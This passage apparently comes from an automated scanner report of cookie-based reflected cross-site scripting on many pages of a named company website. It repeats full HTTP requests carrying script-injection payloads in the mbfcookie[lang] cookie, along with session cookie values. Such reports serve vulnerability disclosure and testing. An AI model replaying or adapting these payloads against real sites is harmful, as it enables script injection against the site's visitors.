Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/network-solutions-we-provide.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=ena99e4"><script>alert(1)</script>5e86c72a29f; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ceac"><script>alert(1)</script>63f3f812b9a was submitted in the mbfcookie[lang] cookie. This input was echoed as 9ceac\"><script>alert(1)</script>63f3f812b9a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/news-events.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en9ceac"><script>alert(1)</script>63f3f812b9a; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb73d"><script>alert(1)</script>c71247202a3 was submitted in the mbfcookie[lang] cookie. This input was echoed as bb73d\"><script>alert(1)</script>c71247202a3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/partnership-inquiry-form.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=enbb73d"><script>alert(1)</script>c71247202a3; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b712"><script>alert(1)</script>d3b5d470576 was submitted in the mbfcookie[lang] cookie. This input was echoed as 1b712\"><script>alert(1)</script>d3b5d470576 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/services-network-support-maintenance-training-2.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en1b712"><script>alert(1)</script>d3b5d470576; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c1e4"><script>alert(1)</script>7b05d39a8bb was submitted in the mbfcookie[lang] cookie. This input was echoed as 4c1e4\"><script>alert(1)</script>7b05d39a8bb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/solution-partners-4.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en4c1e4"><script>alert(1)</script>7b05d39a8bb; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5446"><script>alert(1)</script>29761611793 was submitted in the mbfcookie[lang] cookie. This input was echoed as f5446\"><script>alert(1)</script>29761611793 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/solutions-for-places-in-your-network.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=enf5446"><script>alert(1)</script>29761611793; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64ac0"><script>alert(1)</script>6ebae96397e was submitted in the mbfcookie[lang] cookie. This input was echoed as 64ac0\"><script>alert(1)</script>6ebae96397e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/solutions-for-your-business-needs.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en64ac0"><script>alert(1)</script>6ebae96397e; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53001"><script>alert(1)</script>055958a227a was submitted in the mbfcookie[lang] cookie. This input was echoed as 53001\"><script>alert(1)</script>055958a227a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/technology-partners-4.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en53001"><script>alert(1)</script>055958a227a; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 710ca"><script>alert(1)</script>808460338d8 was submitted in the mbfcookie[lang] cookie. This input was echoed as 710ca\"><script>alert(1)</script>808460338d8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/what-we-do-network-security-solutions-services.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en710ca"><script>alert(1)</script>808460338d8; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f28af"><script>alert(1)</script>be53bf7bfc was submitted in the mbfcookie[lang] cookie. This input was echoed as f28af\"><script>alert(1)</script>be53bf7bfc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/white-papers-global-network-security-topics-2.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=enf28af"><script>alert(1)</script>be53bf7bfc; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7374"><script>alert(1)</script>b64724bdb0 was submitted in the mbfcookie[lang] cookie. This input was echoed as e7374\"><script>alert(1)</script>b64724bdb0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /es/5.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=ene7374"><script>alert(1)</script>b64724bdb0; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e33d8"><script>alert(1)</script>9427a0c6b34 was submitted in the mbfcookie[lang] cookie. This input was echoed as e33d8\"><script>alert(1)</script>9427a0c6b34 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /es/infrastructure-security-report.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=ene33d8"><script>alert(1)</script>9427a0c6b34; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7922b"><script>alert(1)</script>692436b615a was submitted in the mbfcookie[lang] cookie. This input was echoed as 7922b\"><script>alert(1)</script>692436b615a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /fr/4.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en7922b"><script>alert(1)</script>692436b615a; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48fef"><script>alert(1)</script>d8a50681f6d was submitted in the mbfcookie[lang] cookie. This input was echoed as 48fef\"><script>alert(1)</script>d8a50681f6d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /fr/infrastructure-security-report.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en48fef"><script>alert(1)</script>d8a50681f6d; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51c78"><script>alert(1)</script>04e4fe7d485 was submitted in the mbfcookie[lang] cookie. This input was echoed as 51c78\"><script>alert(1)</script>04e4fe7d485 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /index.php HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en51c78"><script>alert(1)</script>04e4fe7d485; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd6b5"><script>alert(1)</script>22edd466f97 was submitted in the mbfcookie[lang] cookie. This input was echoed as bd6b5\"><script>alert(1)</script>22edd466f97 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /it HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=enbd6b5"><script>alert(1)</script>22edd466f97; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b884f"><script>alert(1)</script>27d3dcaf1dc was submitted in the mbfcookie[lang] cookie. This input was echoed as b884f\"><script>alert(1)</script>27d3dcaf1dc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /it/infrastructure-security-report.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=enb884f"><script>alert(1)</script>27d3dcaf1dc; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8184b"><script>alert(1)</script>1699682b65d was submitted in the mbfcookie[lang] cookie. This input was echoed as 8184b\"><script>alert(1)</script>1699682b65d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /jp/2.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en8184b"><script>alert(1)</script>1699682b65d; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4a5f"><script>alert(1)</script>be89fa02b90 was submitted in the mbfcookie[lang] cookie. This input was echoed as e4a5f\"><script>alert(1)</script>be89fa02b90 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /jp/infrastructure-security-report.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=ene4a5f"><script>alert(1)</script>be89fa02b90; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad6f9"><script>alert(1)</script>0bc779789b was submitted in the mbfcookie[lang] cookie. This input was echoed as ad6f9\"><script>alert(1)</script>0bc779789b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /kr/2.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=enad6f9"><script>alert(1)</script>0bc779789b; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e2d6"><script>alert(1)</script>e91882c8043 was submitted in the mbfcookie[lang] cookie. This input was echoed as 4e2d6\"><script>alert(1)</script>e91882c8043 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /kr/network-infrastructure-security-report.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en4e2d6"><script>alert(1)</script>e91882c8043; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac374"><script>alert(1)</script>5a50e0c21ab was submitted in the mbfcookie[lang] cookie. This input was echoed as ac374\"><script>alert(1)</script>5a50e0c21ab in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /privacy_policy.php HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=enac374"><script>alert(1)</script>5a50e0c21ab; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9071"><script>alert(1)</script>e4e30e085f was submitted in the mbfcookie[lang] cookie. This input was echoed as a9071\"><script>alert(1)</script>e4e30e085f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET / HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=ena9071"><script>alert(1)</script>e4e30e085f; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54038"><script>alert(1)</script>1e95dab8e0e was submitted in the mbfcookie[lang] cookie. This input was echoed as 54038\"><script>alert(1)</script>1e95dab8e0e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
